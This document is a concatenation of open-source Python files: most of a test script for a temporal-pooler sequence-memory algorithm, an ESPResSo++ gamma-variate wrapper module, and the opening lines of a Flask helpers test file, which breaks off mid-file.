#---------------------------------------------------------------------------------
def TestB1(numUniquePatterns, nTests, cellsPerColumn = 1, name = "B1"):
numCols = 100
sequenceLength = numUniquePatterns
nFailed = 0
for numSequences in [1]:
print "Test "+name+" (sequence memory - 1 repetition - 1 sequence)"
for k in range(nTests): # Test that configuration several times
trainingSet = buildTrainingSet(numSequences =numSequences,
sequenceLength = sequenceLength,
pctShared = 0.0,
subsequenceStartPos = 0,
numCols = numCols,
minOnes = 15, maxOnes = 20)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = 1,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 8,
newSynapseCount = 11,
permanenceInc = .4,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
activationThreshold = 8,
doPooling = False)
if numFailures == 0:
print "Test "+name+" ok"
else:
print "Test "+name+" failed"
nFailed = nFailed + 1
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return nFailed
def TestB7(numUniquePatterns, nTests, cellsPerColumn = 1, name = "B7"):
numCols = 100
sequenceLength = numUniquePatterns
nFailed = 0
for numSequences in [1]:
print "Test "+name+" (sequence memory - 4 repetition - 1 sequence - slow learning)"
for _ in range(nTests): # Test that configuration several times
trainingSet = buildTrainingSet(numSequences =numSequences,
sequenceLength = sequenceLength,
pctShared = 0.0,
subsequenceStartPos = 0,
numCols = numCols,
minOnes = 15, maxOnes = 20)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = 4,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
minThreshold = 11,
newSynapseCount = 11,
activationThreshold = 11,
initialPerm = .2,
connectedPerm = .6,
permanenceInc = .2,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
doPooling = False)
if numFailures == 0:
print "Test "+name+" ok"
else:
print "Test "+name+" failed"
nFailed = nFailed + 1
print "numFailures=", numFailures,
print "numStrictErrors=", numStrictErrors,
print "numPerfect=", numPerfect
return nFailed
#---------------------------------------------------------------------------------
def TestB2(numUniquePatterns, nTests, cellsPerColumn = 1, name = "B2"):
numCols = 100
sequenceLength = numUniquePatterns
nFailed = 0
for numSequences in [1]: # TestC has multiple sequences
print "Test",name,"(sequence memory - second repetition of the same sequence" +\
" should not add synapses)"
print "Num patterns in sequence =", numUniquePatterns,
print "cellsPerColumn=",cellsPerColumn
for _ in range(nTests): # Test that configuration several times
trainingSet = buildTrainingSet(numSequences =numSequences,
sequenceLength = sequenceLength,
pctShared = 0.0,
subsequenceStartPos = 0,
numCols = numCols,
minOnes = 15, maxOnes = 20)
# Do one pass through the training set
numFailures1, numStrictErrors1, numPerfect1, tp1 = \
testSequence(trainingSet,
nTrainingReps = 1,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 8,
newSynapseCount = 11,
permanenceInc = .4,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
activationThreshold = 8)
# Do two passes through the training set
numFailures, numStrictErrors, numPerfect, tp2 = \
testSequence(trainingSet,
nTrainingReps = 2,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 8,
newSynapseCount = 11,
permanenceInc = .4,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
activationThreshold = 8)
# Check that training with a second pass did not result in more synapses
segmentInfo1 = tp1.getSegmentInfo()
segmentInfo2 = tp2.getSegmentInfo()
if (segmentInfo1[0] != segmentInfo2[0]) or \
(segmentInfo1[1] != segmentInfo2[1]) :
print "Training twice incorrectly resulted in more segments or synapses"
print "Number of segments: ", segmentInfo1[0], segmentInfo2[0]
numFailures += 1
if numFailures == 0:
print "Test",name,"ok"
else:
print "Test",name,"failed"
nFailed = nFailed + 1
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return nFailed
#---------------------------------------------------------------------------------
def TestB3(numUniquePatterns, nTests):
numCols = 100
sequenceLength = numUniquePatterns
nFailed = 0
for numSequences in [2,5]:
print "Test B3 (sequence memory - 2 repetitions -", numSequences, "sequences)"
for _ in range(nTests): # Test that configuration several times
trainingSet = buildTrainingSet(numSequences =numSequences,
sequenceLength = sequenceLength,
pctShared = 0.0,
subsequenceStartPos = 0,
numCols = numCols,
minOnes = 15, maxOnes = 20)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = 2,
numberOfCols = numCols,
cellsPerColumn = 4,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 11,
permanenceInc = .4,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = 11,
activationThreshold = 8,
doPooling = False)
if numFailures == 0:
print "Test B3 ok"
else:
print "Test B3 failed"
nFailed = nFailed + 1
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return nFailed
#---------------------------------------------------------------------------------
def TestH0(numOnes = 5,nMultiStepPrediction=0):
cellsPerColumn = 4
print "Higher order test 0 with cellsPerColumn=",cellsPerColumn
trainingSet = buildSimpleTrainingSet(numOnes)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = 20,
numberOfCols = trainingSet[0][0][0].size,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 6,
permanenceInc = .4,
permanenceDec = .2,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = 5,
activationThreshold = 4,
doPooling = False,
nMultiStepPrediction=nMultiStepPrediction)
if numFailures == 0 and \
numStrictErrors == 0 and \
numPerfect == len(trainingSet[0])*(len(trainingSet[0][0]) - 1):
print "Test PASS"
return 0
else:
print "Test FAILED"
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return 1
#---------------------------------------------------------------------------------
def TestH(sequenceLength, nTests, cellsPerColumn, numCols =100, nSequences =[2],
pctShared = 0.1, seqGenMode = 'shared sequence', nTrainingReps = 2,
shouldFail = False, compareToPy = False, highOrder = False):
nFailed = 0
subsequenceStartPos = 10
assert subsequenceStartPos < sequenceLength
for numSequences in nSequences:
print "Higher order test with sequenceLength=",sequenceLength,
print "cellsPerColumn=",cellsPerColumn,"nTests=",nTests,
print "numSequences=",numSequences, "pctShared=", pctShared
for _ in range(nTests): # Test that configuration several times
trainingSet = buildTrainingSet(numSequences = numSequences,
sequenceLength = sequenceLength,
pctShared = pctShared, seqGenMode = seqGenMode,
subsequenceStartPos = subsequenceStartPos,
numCols = numCols,
minOnes = 21, maxOnes = 25)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = nTrainingReps,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 12,
permanenceInc = .4,
permanenceDec = .1,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = 11,
activationThreshold = 8,
doPooling = False,
shouldFail = shouldFail,
compareToPy = compareToPy,
highOrder = highOrder)
if numFailures == 0 and not shouldFail \
or numFailures > 0 and shouldFail:
print "Test PASS",
if shouldFail:
print '(should fail, and failed)'
else:
print
else:
print "Test FAILED"
nFailed = nFailed + 1
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return nFailed
#---------------------------------------------------------------------------------
def TestH11(numOnes = 3):
cellsPerColumn = 4
print "Higher order test 11 with cellsPerColumn=",cellsPerColumn
trainingSet = buildAlternatingTrainingSet(numOnes= 3)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = 1,
numberOfCols = trainingSet[0][0][0].size,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 6,
permanenceInc = .4,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = 1,
activationThreshold = 1,
doPooling = False)
if numFailures == 0 and \
numStrictErrors == 0 and \
numPerfect == len(trainingSet[0])*(len(trainingSet[0][0]) - 1):
print "Test PASS"
return 0
else:
print "Test FAILED"
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return 1
#---------------------------------------------------------------------------------
def TestH2a(sequenceLength, nTests, cellsPerColumn, numCols =100, nSequences =[2],
pctShared = 0.02, seqGenMode = 'shared sequence',
shouldFail = False):
"""
Still need to test:
Two overlapping sequences. OK to get new segments but check that we can
get correct high order prediction after multiple reps.
"""
print "Test H2a - second repetition of the same sequence should not add synapses"
nFailed = 0
subsequenceStartPos = 10
assert subsequenceStartPos < sequenceLength
for numSequences in nSequences:
print "Higher order test with sequenceLength=",sequenceLength,
print "cellsPerColumn=",cellsPerColumn,"nTests=",nTests,"numCols=", numCols
print "numSequences=",numSequences, "pctShared=", pctShared,
print "sharing mode=", seqGenMode
for _ in range(nTests): # Test that configuration several times
trainingSet = buildTrainingSet(numSequences = numSequences,
sequenceLength = sequenceLength,
pctShared = pctShared, seqGenMode = seqGenMode,
subsequenceStartPos = subsequenceStartPos,
numCols = numCols,
minOnes = 21, maxOnes = 25)
print "============== 10 ======================"
numFailures3, numStrictErrors3, numPerfect3, tp3 = \
testSequence(trainingSet,
nTrainingReps = 10,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .4,
connectedPerm = .7,
minThreshold = 12,
permanenceInc = .1,
permanenceDec = 0.1,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = 15,
activationThreshold = 12,
doPooling = False,
shouldFail = shouldFail)
print "============== 2 ======================"
numFailures, numStrictErrors, numPerfect, tp2 = \
testSequence(trainingSet,
nTrainingReps = 2,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 12,
permanenceInc = .1,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = 15,
activationThreshold = 12,
doPooling = False,
shouldFail = shouldFail)
print "============== 1 ======================"
numFailures1, numStrictErrors1, numPerfect1, tp1 = \
testSequence(trainingSet,
nTrainingReps = 1,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 12,
permanenceInc = .1,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = 15,
activationThreshold = 12,
doPooling = False,
shouldFail = shouldFail)
# Check that training with a second pass did not result in more synapses
segmentInfo1 = tp1.getSegmentInfo()
segmentInfo2 = tp2.getSegmentInfo()
if (abs(segmentInfo1[0] - segmentInfo2[0]) > 3) or \
(abs(segmentInfo1[1] - segmentInfo2[1]) > 3*15) :
print "Training twice incorrectly resulted in too many segments or synapses"
print segmentInfo1
print segmentInfo2
print tp3.getSegmentInfo()
tp3.trimSegments()
print tp3.getSegmentInfo()
print "Failures for 1, 2, and N reps"
print numFailures1, numStrictErrors1, numPerfect1
print numFailures, numStrictErrors, numPerfect
print numFailures3, numStrictErrors3, numPerfect3
numFailures += 1
if numFailures == 0 and not shouldFail \
or numFailures > 0 and shouldFail:
print "Test PASS",
if shouldFail:
print '(should fail, and failed)'
else:
print
else:
print "Test FAILED"
nFailed = nFailed + 1
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return nFailed
#---------------------------------------------------------------------------------
def TestP(sequenceLength, nTests, cellsPerColumn, numCols =300, nSequences =[2],
pctShared = 0.1, seqGenMode = 'shared subsequence', nTrainingReps = 2):
nFailed = 0
newSynapseCount = 7
activationThreshold = newSynapseCount - 2
minOnes = 1.5 * newSynapseCount
maxOnes = .3 * numCols / nTrainingReps
for numSequences in nSequences:
print "Pooling test with sequenceLength=",sequenceLength,
print 'numCols=', numCols,
print "cellsPerColumn=",cellsPerColumn,"nTests=",nTests,
print "numSequences=",numSequences, "pctShared=", pctShared,
print "nTrainingReps=", nTrainingReps, "minOnes=", minOnes,
print "maxOnes=", maxOnes
for _ in range(nTests): # Test that configuration several times
minOnes = 1.5 * newSynapseCount
trainingSet = buildTrainingSet(numSequences =numSequences,
sequenceLength = sequenceLength,
pctShared = pctShared, seqGenMode = seqGenMode,
subsequenceStartPos = 10,
numCols = numCols,
minOnes = minOnes, maxOnes = maxOnes)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = nTrainingReps,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 11,
permanenceInc = .4,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = newSynapseCount,
activationThreshold = activationThreshold,
doPooling = True)
if numFailures == 0 and \
numStrictErrors == 0 and \
numPerfect == numSequences*(sequenceLength - 1):
print "Test PASS"
else:
print "Test FAILED"
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
nFailed = nFailed + 1
return nFailed
#---------------------------------------------------------------------------------
def TestHL0a(numOnes = 5):
cellsPerColumn = 4
newSynapseCount = 5
activationThreshold = newSynapseCount
print "HiLo test 0a with cellsPerColumn=",cellsPerColumn
trainingSet, testSet = buildHL0aTrainingSet()
numCols = trainingSet[0][0].size
numFailures, numStrictErrors, numPerfect, tp = \
testSequence([trainingSet],
nTrainingReps = 1,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .2,
connectedPerm = .7,
permanenceInc = .2,
permanenceDec = 0.05,
permanenceMax = 1,
globalDecay = .0,
minThreshold = activationThreshold,
newSynapseCount = newSynapseCount,
activationThreshold = activationThreshold,
pamLength = 2,
doPooling = False,
testSequences = testSet)
tp.trimSegments()
retAfter = tp.getSegmentInfo()
print retAfter[0], retAfter[1]
if retAfter[0] > 20:
print "Too many segments"
numFailures += 1
if retAfter[1] > 100:
print "Too many synapses"
numFailures += 1
if numFailures == 0:
print "Test HL0a ok"
return 0
else:
print "Test HL0a failed"
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return 1
#---------------------------------------------------------------------------------
def TestHL0b(numOnes = 5):
cellsPerColumn = 4
newSynapseCount = 5
activationThreshold = newSynapseCount
print "HiLo test 0b with cellsPerColumn=",cellsPerColumn
trainingSet, testSet = buildHL0bTrainingSet()
numCols = trainingSet[0][0].size
print "numCols=", numCols
numFailures, numStrictErrors, numPerfect, tp = \
testSequence([trainingSet],
nTrainingReps = 1,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .2,
connectedPerm = .7,
permanenceInc = .2,
permanenceDec = 0.05,
permanenceMax = 1,
globalDecay = .0,
minThreshold = activationThreshold,
newSynapseCount = newSynapseCount,
activationThreshold = activationThreshold,
doPooling = False,
testSequences = testSet)
tp.trimSegments()
retAfter = tp.getSegmentInfo()
tp.printCells()
if numFailures == 0:
print "Test HL0 ok"
return 0
else:
print "Test HL0 failed"
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return 1
#---------------------------------------------------------------------------------
def TestHL(sequenceLength, nTests, cellsPerColumn, numCols =200, nSequences =[2],
pctShared = 0.1, seqGenMode = 'shared subsequence', nTrainingReps = 3,
noiseModel = 'xor binomial in learning only', noiseLevel = 0.1,
hiloOn = True):
nFailed = 0
newSynapseCount = 8
activationThreshold = newSynapseCount
minOnes = 1.5 * newSynapseCount
maxOnes = 0.3 * numCols / nTrainingReps
if hiloOn == False:
minThreshold = 0.9
for numSequences in nSequences:
print "Hilo test with sequenceLength=", sequenceLength,
print "cellsPerColumn=", cellsPerColumn, "nTests=", nTests,
print "numSequences=", numSequences, "pctShared=", pctShared,
print "nTrainingReps=", nTrainingReps, "minOnes=", minOnes,
print "maxOnes=", maxOnes,
print 'noiseModel=', noiseModel, 'noiseLevel=', noiseLevel
for _ in range(nTests): # Test that configuration several times
minOnes = 1.5 * newSynapseCount
trainingSet = buildTrainingSet(numSequences =numSequences,
sequenceLength = sequenceLength,
pctShared = pctShared, seqGenMode = seqGenMode,
subsequenceStartPos = 10,
numCols = numCols,
minOnes = minOnes, maxOnes = maxOnes)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = nTrainingReps,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .2,
connectedPerm = .7,
minThreshold = activationThreshold,
newSynapseCount = newSynapseCount,
activationThreshold = activationThreshold,
permanenceInc = .2,
permanenceDec = 0.05,
permanenceMax = 1,
globalDecay = .0,
doPooling = False,
noiseModel = noiseModel,
noiseLevel = noiseLevel)
if numFailures == 0 and \
numStrictErrors == 0 and \
numPerfect == numSequences*(sequenceLength - 1):
print "Test PASS"
else:
print "Test FAILED"
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
nFailed = nFailed + 1
return nFailed
#-------------------------------------------------------------------------------
def worker(x):
"""Worker function to use in parallel hub capacity test below."""
cellsPerColumn, numSequences = x[0], x[1]
nTrainingReps = 1
sequenceLength = 10
numCols = 200
print 'Started', cellsPerColumn, numSequences
seqGenMode = 'shared subsequence, one pattern'
subsequenceStartPos = 5
trainingSet = buildTrainingSet(numSequences = numSequences,
sequenceLength = sequenceLength,
pctShared = .1, seqGenMode = seqGenMode,
subsequenceStartPos = subsequenceStartPos,
numCols = numCols,
minOnes = 21, maxOnes = 25)
numFailures1, numStrictErrors1, numPerfect1, atHub, tp = \
testSequence(trainingSet,
nTrainingReps = nTrainingReps,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 11,
permanenceInc = .4,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = 8,
activationThreshold = 8,
doPooling = False,
shouldFail = False,
predJustAfterHubOnly = 5)
seqGenMode = 'no shared subsequence'
trainingSet = buildTrainingSet(numSequences = numSequences,
sequenceLength = sequenceLength,
pctShared = 0, seqGenMode = seqGenMode,
subsequenceStartPos = 0,
numCols = numCols,
minOnes = 21, maxOnes = 25)
numFailures2, numStrictErrors2, numPerfect2, tp = \
testSequence(trainingSet,
nTrainingReps = nTrainingReps,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 11,
permanenceInc = .4,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
newSynapseCount = 8,
activationThreshold = 8,
doPooling = False,
shouldFail = False)
print 'Completed',
print cellsPerColumn, numSequences, numFailures1, numStrictErrors1, numPerfect1, atHub, \
numFailures2, numStrictErrors2, numPerfect2
return cellsPerColumn, numSequences, numFailures1, numStrictErrors1, numPerfect1, atHub, \
numFailures2, numStrictErrors2, numPerfect2
#---------------------------------------------------------------------------------
def hubCapacity():
"""
Study hub capacity. Figure out how many sequences can share a pattern
for a given number of cells per column till we the system fails.
DON'T RUN IN BUILD SYSTEM!!! (takes too long)
"""
from multiprocessing import Pool
import itertools
print "Hub capacity test"
# scalar value on predictions by looking at max perm over column
p = Pool(2)
results = p.map(worker, itertools.product([1,2,3,4,5,6,7,8], xrange(1,2000,200)))
f = open('results-numPerfect.11.22.10.txt', 'w')
for i,r in enumerate(results):
print >>f, '{%d,%d,%d,%d,%d,%d,%d,%d,%d},' % r
f.close()
#---------------------------------------------------------------------------------
def runTests(testLength = "short"):
# Data structure to collect results of tests
# TODO: put numFailures, numStrictErrors and numPerfect in here for reporting
tests = {}
# always run this one: if that one fails, we can't do anything
basicTest()
print
#---------------------------------------------------------------------------------
if testLength == "long":
tests['B1'] = TestB1(numUniquePatterns, nTests)
tests['B2'] = TestB2(numUniquePatterns, nTests)
tests['B8'] = TestB7(4, nTests, cellsPerColumn = 4, name="B8")
tests['B10'] = TestB2(numUniquePatterns, nTests, cellsPerColumn = 4,
name = "B10")
# Run these always
tests['B3'] = TestB3(numUniquePatterns, nTests)
tests['B6'] = TestB1(numUniquePatterns, nTests,
cellsPerColumn = 4, name="B6")
tests['B7'] = TestB7(numUniquePatterns, nTests)
print
#---------------------------------------------------------------------------------
#print "Test H11"
#tests['H11'] = TestH11()
if True:
print "Test H0"
tests['H0'] = TestH0(numOnes = 5)
print "Test H2"
#tests['H2'] = TestH(numUniquePatterns, nTests, cellsPerColumn = 4,
# nTrainingReps = numUniquePatterns, compareToPy = False)
print "Test H3"
tests['H3'] = TestH(numUniquePatterns, nTests,
numCols = 200,
cellsPerColumn = 20,
pctShared = 0.3, nTrainingReps=numUniquePatterns,
compareToPy = False,
highOrder = True)
print "Test H4" # Produces 3 false positives, but otherwise fine.
# TODO: investigate initial false positives?
tests['H4'] = TestH(numUniquePatterns, nTests,
cellsPerColumn = 20,
pctShared = 0.1,
seqGenMode='shared subsequence at beginning')
if True:
print "Test H0 with multistep prediction"
tests['H0_MS'] = TestH0(numOnes = 5, nMultiStepPrediction=2)
if True:
print "Test H1" # - Should Fail
tests['H1'] = TestH(numUniquePatterns, nTests,
cellsPerColumn = 1, nTrainingReps = 1,
shouldFail = True)
# Also fails in --long mode. See H2 above
#print "Test H2a"
#tests['H2a'] = TestH2a(numUniquePatterns,
# nTests, pctShared = 0.02, numCols = 300, cellsPerColumn = 4)
if False:
print "Test H5" # make sure seqs are good even with shuffling, fast learning
tests['H5'] = TestH(numUniquePatterns, nTests,
cellsPerColumn = 10,
pctShared = 0.0,
seqGenMode='shuffle, no shared subsequence')
print "Test H6" # should work
tests['H6'] = TestH(numUniquePatterns, nTests,
cellsPerColumn = 10,
pctShared = 0.4,
seqGenMode='shuffle, shared subsequence')
# Try with 2 sequences, then 3 sequences interleaved so that there is
# always a shared pattern, but it belongs to 2 different sequences each
# time!
#print "Test H7"
#tests['H7'] = TestH(numUniquePatterns, nTests,
# cellsPerColumn = 10,
# pctShared = 0.4,
# seqGenMode='shuffle, shared subsequence')
# tricky: if start predicting in middle of subsequence, several predictions
# are possible
#print "Test H8"
#tests['H8'] = TestH(numUniquePatterns, nTests,
# cellsPerColumn = 10,
# pctShared = 0.4,
# seqGenMode='shuffle, shared subsequence')
print "Test H9" # plot hub capacity
tests['H9'] = TestH(numUniquePatterns, nTests,
cellsPerColumn = 10,
pctShared = 0.4,
seqGenMode='shuffle, shared subsequence')
#print "Test H10" # plot
#tests['H10'] = TestH(numUniquePatterns, nTests,
# cellsPerColumn = 10,
# pctShared = 0.4,
# seqGenMode='shuffle, shared subsequence')
print
#---------------------------------------------------------------------------------
if False:
print "Test P1"
tests['P1'] = TestP(numUniquePatterns, nTests,
cellsPerColumn = 4,
pctShared = 0.0,
seqGenMode = 'no shared subsequence',
nTrainingReps = 3)
if False:
print "Test P2"
tests['P2'] = TestP(numUniquePatterns, nTests,
cellsPerColumn = 4,
pctShared = 0.0,
seqGenMode = 'no shared subsequence',
nTrainingReps = 5)
print "Test P3"
tests['P3'] = TestP(numUniquePatterns, nTests,
cellsPerColumn = 4,
pctShared = 0.0,
seqGenMode = 'no shared subsequence',
nSequences = [2] if testLength == 'short' else [2,5],
nTrainingReps = 5)
print "Test P4"
tests['P4'] = TestP(numUniquePatterns, nTests,
cellsPerColumn = 4,
pctShared = 0.0,
seqGenMode = 'shared subsequence',
nSequences = [2] if testLength == 'short' else [2,5],
nTrainingReps = 5)
print
#---------------------------------------------------------------------------------
if True:
print "Test HL0a"
tests['HL0a'] = TestHL0a(numOnes = 5)
if False:
print "Test HL0b"
tests['HL0b'] = TestHL0b(numOnes = 5)
print "Test HL1"
tests['HL1'] = TestHL(sequenceLength = 20,
nTests = nTests,
numCols = 100,
nSequences = [1],
nTrainingReps = 3,
cellsPerColumn = 1,
seqGenMode = 'no shared subsequence',
noiseModel = 'xor binomial in learning only',
noiseLevel = 0.1,
doResets = False)
print "Test HL2"
tests['HL2'] = TestHL(numUniquePatterns = 20,
nTests = nTests,
numCols = 200,
nSequences = [1],
nTrainingReps = 3,
cellsPerColumn = 1,
seqGenMode = 'no shared subsequence',
noiseModel = 'xor binomial in learning only',
noiseLevel = 0.1,
doResets = False)
print "Test HL3"
tests['HL3'] = TestHL(numUniquePatterns = 30,
nTests = nTests,
numCols = 200,
nSequences = [2],
pctShared = 0.66,
nTrainingReps = 3,
cellsPerColumn = 1,
seqGenMode = 'shared subsequence',
noiseModel = None,
noiseLevel = 0.0,
doResets = True)
print "Test HL4"
tests['HL4'] = TestHL(numUniquePatterns = 30,
nTests = nTests,
numCols = 200,
nSequences = [2],
pctShared = 0.66,
nTrainingReps = 3,
cellsPerColumn = 1,
seqGenMode = 'shared subsequence',
noiseModel = None,
noiseLevel = 0.0,
doResets = False)
print "Test HL5"
tests['HL5'] = TestHL(numUniquePatterns = 30,
nTests = nTests,
numCols = 200,
nSequences = [2],
pctShared = 0.66,
nTrainingReps = 3,
cellsPerColumn = 1,
seqGenMode = 'shared subsequence',
noiseModel = 'xor binomial in learning only',
noiseLevel = 0.1,
doResets = False)
print "Test HL6"
tests['HL6'] = nTests - TestHL(numUniquePatterns = 20,
nTests = nTests,
numCols = 200,
nSequences = [1],
nTrainingReps = 3,
cellsPerColumn = 1,
seqGenMode = 'no shared subsequence',
noiseModel = 'xor binomial in learning only',
noiseLevel = 0.1,
doResets = True,
hiloOn = False)
print
#---------------------------------------------------------------------------------
nFailures = 0
for k,v in tests.iteritems():
nFailures = nFailures + v
if nFailures > 0: # 1 to account for H1
print "There are failed tests"
print "Test\tn failures"
for k,v in tests.iteritems():
print k, "\t", v
assert 0
else:
print "All tests pass"
#---------------------------------------------------------------------------------
# Keep
if False:
import hotshot
import hotshot.stats
prof = hotshot.Profile("profile.prof")
prof.runcall(TestB2, numUniquePatterns=100, nTests=2)
prof.close()
stats = hotshot.stats.load("profile.prof")
stats.strip_dirs()
stats.sort_stats('time', 'calls')
stats.print_stats(50)
#---------------------------------------------------------------------------------
if __name__=="__main__":
if not TEST_CPP_TP:
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
print "!! WARNING: C++ TP testing is DISABLED until it can be updated."
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
# Three different test lengths are passed in through the command line.
# Developer tests use --short. Autobuild does not pass in anything.
# Acceptance tests pass in --long. testLength reflects these possibilities
# as "autobuild", "short", and "long"
testLength = "autobuild"
# Scan command line arguments to see what to do for the seed
# TODO: make default be a random seed, once we're sure it will pass reliably!
for i,arg in enumerate(sys.argv):
if 'seed' in arg:
try:
# used specified seed
SEED = int(sys.argv[i+1])
except ValueError as e:
# random seed
SEED = numpy.random.randint(100)
if 'verbosity' in arg:
VERBOSITY = int(sys.argv[i+1])
if 'help' in arg:
print "TPTest.py --short|long --seed number|'rand' --verbosity number"
sys.exit()
if "short" in arg:
testLength = "short"
if "long" in arg:
testLength = "long"
rgen = numpy.random.RandomState(SEED) # always call this rgen, NOT random
# Setup the severity and length of the tests
if testLength == "short":
numUniquePatterns = 50
nTests = 1
elif testLength == "autobuild":
print "Running autobuild tests"
numUniquePatterns = 50
nTests = 1
elif testLength == "long":
numUniquePatterns = 100
nTests = 3
print "TP tests", testLength, "numUniquePatterns=", numUniquePatterns, "nTests=", nTests,
print "seed=", SEED
print
if testLength == "long":
print 'Testing Python TP'
TPClass = TP
runTests(testLength)
if testLength != 'long':
checkSynapseConsistency = False
else:
# Setting this to True causes test to take way too long
# Temporarily turned off so we can investigate
checkSynapseConsistency = False
if TEST_CPP_TP:
print 'Testing C++ TP'
TPClass = TP10X2
runTests(testLength)
| gpl-3.0 |
MrTheodor/espressopp | src/esutil/GammaVariate.py | 7 | 1686 | # Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
r"""
******************************
espressopp.esutil.GammaVariate
******************************
.. function:: espressopp.esutil.GammaVariate(alpha, beta)
:param alpha:
:param beta:
:type alpha:
:type beta:
"""
from espressopp import pmi
from _espressopp import esutil_GammaVariate
class GammaVariateLocal(esutil_GammaVariate):
def __init__(self, alpha, beta):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
cxxinit(self, esutil_GammaVariate, alpha, beta)
if pmi.isController:
class GammaVariate(object):
__metaclass__ = pmi.Proxy
"""A random gamma variate."""
pmiproxydefs = dict(
cls = 'espressopp.esutil.GammaVariateLocal',
localcall = [ '__call__' ],
)
| gpl-3.0 |
rawrgulmuffins/flask | tests/test_helpers.py | 1 | 24772 | # -*- coding: utf-8 -*-
"""
tests.helpers
~~~~~~~~~~~~~~~~~~~~~~~
Various helpers.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import pytest
import os
import datetime
import flask
from logging import StreamHandler
from werkzeug.http import parse_cache_control_header, parse_options_header
from werkzeug.http import http_date
from flask._compat import StringIO, text_type
def has_encoding(name):
try:
import codecs
codecs.lookup(name)
return True
except LookupError:
return False
class TestJSON(object):
def test_jsonify_date_types(self):
"""Test jsonify with datetime.date and datetime.datetime types."""
test_dates = (
